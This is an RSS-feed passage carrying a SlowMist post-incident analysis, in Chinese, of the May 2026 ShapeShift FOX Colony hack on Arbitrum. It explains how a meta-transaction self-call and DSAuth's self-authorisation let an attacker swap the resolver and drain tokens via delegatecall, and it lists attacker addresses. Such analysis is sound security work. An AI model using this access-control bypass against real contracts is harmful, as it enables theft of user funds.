src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1c81f554&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247505005%26idx%3D2%26sn%3Db921a0eaa914c68c5b819df6b2af116d">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 15 May 2026 19:50:00 +0800</pubDate>
    </item>
    <item>
      <title>被黑分析 | ShapeShift FOX Colony 授权信任链缺陷</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504946&amp;idx=1&amp;sn=7904df2118a2c618557db8bdd810f2b6</link>
      <description>本文通过分析 ShapeShift FOX Colony 遭袭案例，揭示了元交易自调用与自动授权逻辑产生的语义冲突如何导致权限被完全绕过，并最终致使合约资产被清空。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-14 21:18</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=aebe2ce3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJwJTI5usVmo4lCYPDkbUmgs9tmZkPEAjazyv66UeABq0TiaZWGeY9R8hiaaxPx9dxiczqr6AUwXecxDhrrMEUhk001N16q8Bicm6w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本文通过分析 ShapeShift FOX Colony 遭袭案例，揭示了元交易自调用与自动授权逻辑产生的语义冲突如何导致权限被完全绕过，并最终致使合约资产被清空。</p>
  <p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></p></b></b></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 5 月，ShapeShift FOX Colony 项目部署在 Arbitrum 上的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouterCreate3</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 合约遭到攻击。攻击者利用合约元交易机制中的「任意自调用」能力，配合 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DSAuth</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 对 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">address(this)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的自动授权逻辑，绕过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">auth</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 修饰符将合约的核心路由组件 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolver</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 替换为恶意版本，进而通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">delegatecall</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 清空合约持有的全部 ERC20 资产。</span></span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">本次攻击的本质是「元交易元语与内部自调用授权模式的语义冲突」所导致的一次完全权限绕过。</span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021291" data-ratio="0.37592592592592594" width="624" data-type="png" data-w="1080" height="235" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d24e1c0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJ2l6HhGZfoDpk6dia1fRHtMD3mLnjQvj0BrjKmASOz8FZzNOhSbYa6QjZAQw7UTBeJk5ZNK2Dxicc1VIWIr7SRWGA1RNS3fkxRE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">攻击概览</span></span></h2><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">字段</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">详情</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击类型</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">访问控制绕过 / 元交易任意自调用致 Resolver 劫持 + 恶意 delegatecall 资产清空（Access Control Bypass via Meta-Transaction Self-Call → Resolver Hijacking）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">受害合约</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`0x5c59d0ec51729e40c413903be6a4612f4e2452da`（EtherRouterCreate3 / EtherRouter，ShapeShift FOX Colony）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者 EOA</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`0xeed236afb6967f74099a0a6bf078bc6b865fbf28`</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`0x835a701fd76b96a76ee84de037d41f059ee29f5c`（临时）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">获利金额</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">132,704.591501 USDC + 1.9495 WETH（约合 136,000 USD）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">所在链</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Arbitrum</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易数量</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">单笔原子交易（攻击逻辑在 constructor 中全链路执行）</span></span></p></td></tr></tbody></table><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 16px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">漏洞根因</span></span></h2><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 的任意自调用：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">address(this).call(callData)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 未过滤敏感 selector </span></span></h3></b></p><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouter</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 本身是一个基于 resolver 的可升级代理架构：对于未知函数选择器，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">fallback()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolver.lookup(msg.sig)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 找到实现地址后通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">delegatecall</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 执行。元交易功能（</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）由旧 resolver </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: 